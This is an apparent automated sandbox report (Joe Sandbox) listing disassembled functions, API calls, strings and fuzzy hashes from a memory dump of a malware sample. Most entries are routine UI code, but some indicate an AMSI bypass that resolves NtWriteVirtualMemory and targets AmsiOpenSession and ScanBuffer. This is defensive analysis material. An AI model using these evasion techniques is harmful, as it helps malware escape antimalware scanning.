Uniqueness Score: -1.00%

Function 040B25CC Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 040B296A

Strings

An unexpected memory leak has occurred. , xrefs: 040B272C
String, xrefs: 040B283D
7, xrefs: 040B273D
, xrefs: 040B28B0
bytes: , xrefs: 040B27F9
Unknown, xrefs: 040B2828
The sizes of unexpected leaked medium and large blocks are: , xrefs: 040B28E5
Unexpected Memory Leak, xrefs: 040B295C
The unexpected small block leaks are:, xrefs: 040B27A3

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: d859c4f5281cbda8b4414c88a6582b1cfc82133eeeed34d51fffe0a0a18cf391
Instruction ID: d4defe835461ec4e0c75c3e15059365e8196d6fa384901b130b676811fc50b42
Opcode Fuzzy Hash: d859c4f5281cbda8b4414c88a6582b1cfc82133eeeed34d51fffe0a0a18cf391
Instruction Fuzzy Hash: 0BA1E630A042548BEF21AB2CC888BD876E5EB49718F1445E9E4C9BB341DB74A9C5CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 04108CE4 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 04108D04
GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 04108D1B
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 04108D21
IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 04108DAF
IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 04108DBB
IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 04108DCF

Strings

C:\Windows\System32\KernelBase.dll, xrefs: 04108D16
LoadLibraryExA, xrefs: 04108D11

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: HugeRead$AddressHandleModuleProc
String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
API String ID: 1004233883-1650066521
Opcode ID: 8c7274db5e94e5ce0534b8151ab142b5859ad7e2fe75b3b717169f5e8b2413be
Instruction ID: 5af1c81662f378a37e9a0d87718355570847c68b6c7ff1604c883c6ae592ed5f
Opcode Fuzzy Hash: 8c7274db5e94e5ce0534b8151ab142b5859ad7e2fe75b3b717169f5e8b2413be
Instruction Fuzzy Hash: E2316171604305BBEB20EF64CCC1F9A77B8AF1432CF048650EA54AB2C1D7B5F98087A5

Uniqueness

Uniqueness Score: -1.00%

Function 040D3510 Relevance: 16.6, APIs: 11, Instructions: 131windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 040D3531
GetDC.USER32(00000000), ref: 040D3574
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 040D35A1
ReleaseDC.USER32(00000000,00000000), ref: 040D35C7
SelectObject.GDI32(?,?), ref: 040D35E2
SelectObject.GDI32(?,00000000), ref: 040D35F1
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 040D361D
SelectObject.GDI32(?,00000000), ref: 040D362B
SelectObject.GDI32(?,00000000), ref: 040D3639
DeleteDC.GDI32(?), ref: 040D364F
DeleteDC.GDI32(?), ref: 040D3658

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: ObjectSelect$CompatibleCreateDelete$BitmapReleaseStretch
String ID:
API String ID: 4031419535-0
Opcode ID: 567bee17c060f1342af7bb54909f646cbc234a3ac7dae409064f4a87b05e5081
Instruction ID: e0eedcc81f8b8805a0839d4d13c6bc6a0177eb2bf7e2437e8511247fa1341802
Opcode Fuzzy Hash: 567bee17c060f1342af7bb54909f646cbc234a3ac7dae409064f4a87b05e5081
Instruction Fuzzy Hash: 1541EF72E00349AFEB51EBE8CC41FEEB7BCEB08704F414811BA04F7240D675A9048BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0410AE00 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 420libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,UacScan,041469E4,0410B464,OpenSession,041469E4,0410B464,ScanBuffer,041469E4,0410B464,00000000,0410B44C), ref: 0410AF47
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0410AF4D

Part of subcall function 040CFD38: GetProcAddress.KERNEL32(0414A358,00000000), ref: 040CFD97
Part of subcall function 040CFD38: GetCurrentProcess.KERNEL32(0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 040CFDE3
Part of subcall function 040CFD38: FreeLibrary.KERNEL32(0414A358,00000000,0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000), ref: 040CFDF4

Strings

ScanString, xrefs: 0410B072
ScanBuffer, xrefs: 0410AE39, 0410B013, 0410B136, 0410B253, 0410B3C2
UacScan, xrefs: 0410AEEB
C:\Windows\System32\ntdll.dll, xrefs: 0410AF42
NtWriteVirtualMemory, xrefs: 0410AF3D
OpenSession, xrefs: 0410AE92, 0410AFBA, 0410B2C4, 0410B351
UacInitialize, xrefs: 0410AF61, 0410B0CB, 0410B1E2

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AddressProc$CurrentFreeHandleLibraryModuleProcess
String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
API String ID: 3037636159-4174081549
Opcode ID: 7ac753a9602d486b42a55862f235c615bffc29ec132caae84f9b9cdf66907aec
Instruction ID: fc6cc7effa938f4c70b1b149882859b0b2c43222d6e30be9af28126a4cad1dca
Opcode Fuzzy Hash: 7ac753a9602d486b42a55862f235c615bffc29ec132caae84f9b9cdf66907aec
Instruction Fuzzy Hash: C0F11E31A001199BEB05EBA4C980FCEB3B9AF4520CF1181A6E145FB356DB74BF458F96

Uniqueness

Uniqueness Score: -1.00%

Function 0410BCF8 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 400processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 040CFD38: GetProcAddress.KERNEL32(0414A358,00000000), ref: 040CFD97
Part of subcall function 040CFD38: GetCurrentProcess.KERNEL32(0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 040CFDE3
Part of subcall function 040CFD38: FreeLibrary.KERNEL32(0414A358,00000000,0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000), ref: 040CFDF4

CreateProcessAsUserW.ADVAPI32(0423EA3C,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,0423EBB8,0423EBFC,ScanString,041469E4,0410C330,OpenSession,041469E4), ref: 0410C05F
WaitForSingleObject.KERNEL32(0423EBFC,000000FF,ScanString,041469E4,0410C330,OpenSession,041469E4,0410C330,ScanString,041469E4,0410C330,OpenSession,041469E4,0410C330,UacScan,041469E4), ref: 0410C2AB
CloseHandle.KERNEL32(0423EBFC,0423EBFC,000000FF,ScanString,041469E4,0410C330,OpenSession,041469E4,0410C330,ScanString,041469E4,0410C330,OpenSession,041469E4,0410C330,UacScan), ref: 0410C2B6
CloseHandle.KERNEL32(0423EC00,0423EBFC,0423EBFC,000000FF,ScanString,041469E4,0410C330,OpenSession,041469E4,0410C330,ScanString,041469E4,0410C330,OpenSession,041469E4,0410C330), ref: 0410C2C1

Strings

Amsi, xrefs: 0410BE9D
AmsiOpenSession, xrefs: 0410BE8C
UacScan, xrefs: 0410BD31, 0410BED5, 0410C06B
ScanString, xrefs: 0410BDE3, 0410BF87, 0410C14D, 0410C239
OpenSession, xrefs: 0410BD8A, 0410BF2E, 0410C0DC, 0410C1C8

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$AddressCreateCurrentFreeLibraryObjectProcSingleUserWait
String ID: Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
API String ID: 1235825717-661810597
Opcode ID: d618e744c91a24b7eb7e4da7f3face6330d60493c3aa1c460359bb8d76d948e4
Instruction ID: 620b2430a45becd48c2d721de5cd04839ed29e0a6ff2330f9204ea7f9b8cef0a
Opcode Fuzzy Hash: d618e744c91a24b7eb7e4da7f3face6330d60493c3aa1c460359bb8d76d948e4
Instruction Fuzzy Hash: 13F11D31A101199BEB15EBA4D980FCEB3BAAF4520CF1181A5E084BB355DB70FE458FD9

Uniqueness

Uniqueness Score: -1.00%

Function 040B743C Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 61registrywindowclipboardCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 040B746F
RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 040B747B
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 040B7493
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 040B74B7

Strings

MSH_SCROLL_LINES_MSG, xrefs: 040B7476
Magellan MSWHEEL, xrefs: 040B744A
MSH_WHEELSUPPORT_MSG, xrefs: 040B746A
MSWHEEL_ROLLMSG, xrefs: 040B745B
MouseZ, xrefs: 040B744F

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: ClipboardFormatMessageRegisterSend
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 1437703442-3736581797
Opcode ID: 89ea91867a6f2d78a1e34caa83bb144f7a196229fb16148375aee6eba85df289
Instruction ID: 39b21ac47767f1284e3720600ae9a4f6f8178986e17b3b69c8b549081c0f2826
Opcode Fuzzy Hash: 89ea91867a6f2d78a1e34caa83bb144f7a196229fb16148375aee6eba85df289
Instruction Fuzzy Hash: 3211EF71244305AFE7159FA5DC41BE6BBE8EF84715F108465B9C4AF280E7B0B940CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 040FF0F8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 040FF143
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 040FF161
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 040FF16E
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 040FF17B
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 040FF188
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 040FF195
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 040FF1A2
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 040FF1AF
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 040FF1CD
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 040FF1E9

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
Instruction ID: 71cbd9303053e6467ce6ed928efa852b1098443bb30588d3d5d8fd8e827f60e7
Opcode Fuzzy Hash: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
Instruction Fuzzy Hash: 6621CA70384345BAF760DB24CC8DFDA7AD96B14B1CF0544A0BA887F6D2C6B5BA408759

Uniqueness

Uniqueness Score: -1.00%

Function 040B25CA Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

An unexpected memory leak has occurred. , xrefs: 040B272C
7, xrefs: 040B273D
, xrefs: 040B28B0
bytes: , xrefs: 040B27F9
The sizes of unexpected leaked medium and large blocks are: , xrefs: 040B28E5
Unexpected Memory Leak, xrefs: 040B295C
The unexpected small block leaks are:, xrefs: 040B27A3

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 65876aded9ab3d1d7885246f1b10ed5dc678bf2c673f58935e639c95266da679
Instruction ID: 9591cd641433e8e48ffd9381cd7368ef7f6572064d4d3ef3dcd2b2a3563ba22c
Opcode Fuzzy Hash: 65876aded9ab3d1d7885246f1b10ed5dc678bf2c673f58935e639c95266da679
Instruction Fuzzy Hash: 3971C730A042588BEF21AB2CC888BD9B6E5EB4D714F1045E9D4CDFB341DB74A9C5CB99

Uniqueness

Uniqueness Score: -1.00%

Function 040EA170 Relevance: 13.7, APIs: 9, Instructions: 154COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 040EA1AB
MulDiv.KERNEL32(?,?,?), ref: 040EA1C5
MulDiv.KERNEL32(?,?,?), ref: 040EA1F3
MulDiv.KERNEL32(?,?,?), ref: 040EA209
MulDiv.KERNEL32(?,?,?), ref: 040EA241
MulDiv.KERNEL32(?,?,?), ref: 040EA259
MulDiv.KERNEL32(?), ref: 040EA2B0
MulDiv.KERNEL32(?), ref: 040EA2DA
MulDiv.KERNEL32(00000000), ref: 040EA300

Part of subcall function 040D2518: MulDiv.KERNEL32(00000000,?,00000048), ref: 040D2525

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33267803c358b2f5c816da34f4eb87f16030dfa62666ccbc326171017ba1e9a7
Instruction ID: a9accd8f77d841c44b69c62e51b77c8afb1b7f624b714ea5bc78c3929b6639b5
Opcode Fuzzy Hash: 33267803c358b2f5c816da34f4eb87f16030dfa62666ccbc326171017ba1e9a7
Instruction Fuzzy Hash: EE51FB70708750AFD320DA6AC884BBAB7F9AF89704F044C5DB9D5E7252D63AF854CB21

Uniqueness

Uniqueness Score: -1.00%

Function 040B5C18 Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrcpyn.KERNEL32(?,?,?), ref: 040B5C7C
lstrcpyn.KERNEL32(?,?,0000005C,kernel32.dll), ref: 040B5CE0
lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 040B5D16
lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 040B5D7B
lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 040B5D87
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 040B5DA9

Strings

kernel32.dll, xrefs: 040B5C30
\, xrefs: 040B5D59
GetLongPathNameA, xrefs: 040B5C43

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: lstrcpyn$lstrlen
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 4046762626-1565342463
Opcode ID: 96622980ab6cb038da0b8330fe51be4d72fd7d33cb6108d2a7790d82a62c8dbf
Instruction ID: 3f116db0e5823fbb06df4a91409f151bbd738d39f3a3938bf20a1f09c8dc10cb
Opcode Fuzzy Hash: 96622980ab6cb038da0b8330fe51be4d72fd7d33cb6108d2a7790d82a62c8dbf
Instruction Fuzzy Hash: FC417F71E00659BFDB60DFE8CC88ADEB7FDEF48248F0445E5A584F7240D670AA508B98

Uniqueness

Uniqueness Score: -1.00%

Function 040EB0F4 Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 040EB12B
GetDCEx.USER32(?,00000000,00000402), ref: 040EB13E
SelectObject.GDI32(?,00000000), ref: 040EB161
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 040EB187
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 040EB1A9
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 040EB1C8
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 040EB1E2
SelectObject.GDI32(?,?), ref: 040EB1EF
ReleaseDC.USER32(?,?), ref: 040EB209

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: ObjectSelect$DesktopReleaseWindow
String ID:
API String ID: 1187665388-0
Opcode ID: 963a918b23a994248373431520c127038ce8ca7c9b4a91f43c8cb5e1b7257617
Instruction ID: 782a415e31a827d56fbb99ce3972f3f51450e6446e7fe7689ba56f805e84db72
Opcode Fuzzy Hash: 963a918b23a994248373431520c127038ce8ca7c9b4a91f43c8cb5e1b7257617
Instruction Fuzzy Hash: 1631E876E00219AFDB00DEEDCC85DEFBBBCAF49608B414464B544F7244D676AD048BA5

Uniqueness

Uniqueness Score: -1.00%

Function 040EE58C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(?,?,?), ref: 040EE650
UnregisterClassA.USER32(?,?), ref: 040EE678
RegisterClassA.USER32(?), ref: 040EE68E
GetWindowLongA.USER32(00000000,000000F0), ref: 040EE6CA
GetWindowLongA.USER32(00000000,000000F4), ref: 040EE6DF
SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 040EE6F2

Strings

@, xrefs: 040EE5C5

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: ClassLongWindow$InfoRegisterUnregister
String ID: @
API String ID: 717780171-2766056989
Opcode ID: c2c9ba3ada4b63c33d9bbd19b24fc656f7cc7377fa5d2152a746b4d2fb54dc81
Instruction ID: 43be097bc1b4e680fdfab488fa950bdf7c26b96a60572573b140837184ca5fad
Opcode Fuzzy Hash: c2c9ba3ada4b63c33d9bbd19b24fc656f7cc7377fa5d2152a746b4d2fb54dc81
Instruction Fuzzy Hash: 1D517F31A003588FEB20EB69CC44BEE77E9AF4530CF4045A9E495FB291DB35B945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 041006A4 Relevance: 12.2, APIs: 8, Instructions: 154windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 04100715
GetCapture.USER32 ref: 04100724
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0410072A
ReleaseCapture.USER32 ref: 0410072F
GetActiveWindow.USER32 ref: 04100780
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 04100816
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 04100883
GetActiveWindow.USER32 ref: 04100892

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: 0907c7b6e5a751332e1660cf65cd00fd549a8a21c0df9eaf173e98648a8a04d2
Instruction ID: 22eccbc2ca86b85916d5ce228565419ab12d59df6fa4337da033206b92cc804e
Opcode Fuzzy Hash: 0907c7b6e5a751332e1660cf65cd00fd549a8a21c0df9eaf173e98648a8a04d2
Instruction Fuzzy Hash: 9D514134A40244EFEB11EF65D985BDD7BF1EF89708F1580A4E444AB291D779BE40DB40

Uniqueness

Uniqueness Score: -1.00%

Function 040DDD94 Relevance: 12.1, APIs: 8, Instructions: 142COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00000000,?), ref: 040DDDCA
OffsetRect.USER32(?,?,?), ref: 040DDDDF
GetWindowLongA.USER32(00000000,000000F0), ref: 040DDE1E
GetSystemMetrics.USER32(00000002), ref: 040DDE33
GetSystemMetrics.USER32(00000003), ref: 040DDE3C
FillRect.USER32(?,?,00000000), ref: 040DDE86
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,00000000,0000000F,?,000000FE,000000FE,00000003,00000002,00000000,000000F0), ref: 040DDEAB
ReleaseDC.USER32(00000000,?), ref: 040DDEE9

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Rect$MetricsSystemWindow$ClipExcludeFillLongOffsetRelease
String ID:
API String ID: 3012522431-0
Opcode ID: e66e972a82b288649c40070d8237c6999687847684ec2f29f1fe17088c728285
Instruction ID: c30b8758115b8de15b5aa71443727091a66ab931c00725d38792335b049d4e54
Opcode Fuzzy Hash: e66e972a82b288649c40070d8237c6999687847684ec2f29f1fe17088c728285
Instruction Fuzzy Hash: C341ED71A04609ABEB11EBE8CD41EEFB7BDEF89218F100561F904F7290D631BE0587A4

Uniqueness

Uniqueness Score: -1.00%

Function 040EFD5C Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

SaveDC.GDI32(?), ref: 040EFD79
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 040EFDB2
GetWindowLongA.USER32(00000000,000000EC), ref: 040EFDC6
GetWindowLongA.USER32(00000000,000000F0), ref: 040EFDE7
SetRect.USER32(?,00000000,00000000,?,?), ref: 040EFE17
DrawEdge.USER32(?,?,00000000,00000000), ref: 040EFE26
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 040EFE4F
RestoreDC.GDI32(?,?), ref: 040EFECE

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Rect$ClipIntersectLongWindow$DrawEdgeRestoreSave
String ID:
API String ID: 4023346126-0
Opcode ID: a42c34ad305dd0b3276438f774bdd82d9f0d444db6a95185faa5733b1debc2db
Instruction ID: e9832cc491fb5651d4a39d271e07c221a3e70fd1910373185a53795b9dfdf04c
Opcode Fuzzy Hash: a42c34ad305dd0b3276438f774bdd82d9f0d444db6a95185faa5733b1debc2db
Instruction Fuzzy Hash: 6441EA75A04209AFEB10DBA9C981FEEB7F9EB48308F1141A5E604FB391D635BE41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 040F3708 Relevance: 10.7, APIs: 7, Instructions: 162COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,040F38EC), ref: 040F37ED
GetTickCount.KERNEL32 ref: 040F37F2
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 040F3836
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 040F384E
AnimateWindow.USER32(00000000,00000064,?), ref: 040F3893
ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,040F38EC), ref: 040F38B6

Part of subcall function 040F6EC8: GetCursorPos.USER32(?), ref: 040F6ECC

GetTickCount.KERNEL32 ref: 040F38D3

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
String ID:
API String ID: 3024527889-0
Opcode ID: 8aad14225507099fce2ce77d9664776af8a495090c8332a0920fc93ad1d53f7c
Instruction ID: 2eb165a8a74b0d1810f4c09617bcbc9a4cac31493e80d05471107e6133c2d4df
Opcode Fuzzy Hash: 8aad14225507099fce2ce77d9664776af8a495090c8332a0920fc93ad1d53f7c
Instruction Fuzzy Hash: 04513674A00205EFEB50DFA8C980AEEB7F5EB44318F6085A0EA00BB654D775BE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 041040FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138windowCOMMON

Download Yara Rule

APIs

Part of subcall function 041054A8: GetActiveWindow.USER32 ref: 041054CF
Part of subcall function 041054A8: GetLastActivePopup.USER32(?), ref: 041054E1

GetWindowRect.USER32(?,?), ref: 0410417E
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 041041B6
MessageBoxA.USER32(00000000,?,?,?), ref: 041041F5
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0410426B,?,00000000,04104264), ref: 04104245
SetActiveWindow.USER32(00000000,0410426B,?,00000000,04104264), ref: 04104256

Strings

(, xrefs: 0410415B

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Window$Active$LastMessagePopupRect
String ID: (
API String ID: 3456420849-3887548279
Opcode ID: 0de6c5c6751774a94633cb9f8735d72839d7260c6e922cc6b153b01e6b407161
Instruction ID: 88a1c1fcb90c5993b2a89ff9cc1276cee98c77d5b1483a425dffc25e22707a66
Opcode Fuzzy Hash: 0de6c5c6751774a94633cb9f8735d72839d7260c6e922cc6b153b01e6b407161
Instruction Fuzzy Hash: 6151C8B5A00218AFDB04DFA8DD81FAEB7F9EB89704F148465E604EB791D7B4BD008B50

Uniqueness

Uniqueness Score: -1.00%

Function 040DB24C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 040DB285
GetSystemMetrics.USER32(00000000), ref: 040DB2AA
GetSystemMetrics.USER32(00000001), ref: 040DB2B5
IntersectRect.USER32(?,?,?), ref: 040DB2FE
IntersectRect.USER32(?,?,?), ref: 040DB314

Part of subcall function 040DACA4: GetProcAddress.KERNEL32(0414A568,00000000), ref: 040DAD23

Strings

EnumDisplayMonitors, xrefs: 040DB264

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: IntersectMetricsRectSystem$AddressDisplayEnumMonitorsProc
String ID: EnumDisplayMonitors
API String ID: 2238260564-2491903729
Opcode ID: 5e40bc10bb7e17d2608651601d50c8ee15a11802f4fd877ebbd0a961678247dd
Instruction ID: fe3c11c2baaf62f04bac328120d945d653bacacf9277c7b176acfafdda2170d2
